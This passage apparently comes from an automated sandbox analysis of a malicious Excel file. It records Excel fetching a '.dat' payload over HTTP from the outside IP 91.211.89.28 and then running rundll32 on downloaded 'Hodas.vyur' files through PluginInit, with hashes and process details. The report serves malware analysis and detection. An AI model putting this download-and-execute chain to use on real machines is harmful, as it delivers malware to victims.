              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              2 | 192.168.2.22 | 49169 | 91.211.89.28 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Timestamp | kBytes transferred | Direction | Data
              Apr 1, 2021 21:31:59.056567907 CEST | 3 | OUT | GET /44285,5327891204.dat HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 91.211.89.28
              Connection: Keep-Alive
              Apr 1, 2021 21:31:59.201011896 CEST | 4 | IN | HTTP/1.1 403 Forbidden
              Server: nginx
              Date: Thu, 01 Apr 2021 19:31:59 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: keep-alive
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Code Manipulations

              Statistics

              Behavior

              System Behavior

              General

              Start time:21:31:37
              Start date:01/04/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13f0c0000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:21:31:42
              Start date:01/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur,PluginInit
              Imagebase:0xff450000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:21:31:42
              Start date:01/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur1,PluginInit
              Imagebase:0xff450000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:21:31:42
              Start date:01/04/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 ..\Hodas.vyur2,PluginInit
              Imagebase:0xff450000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis
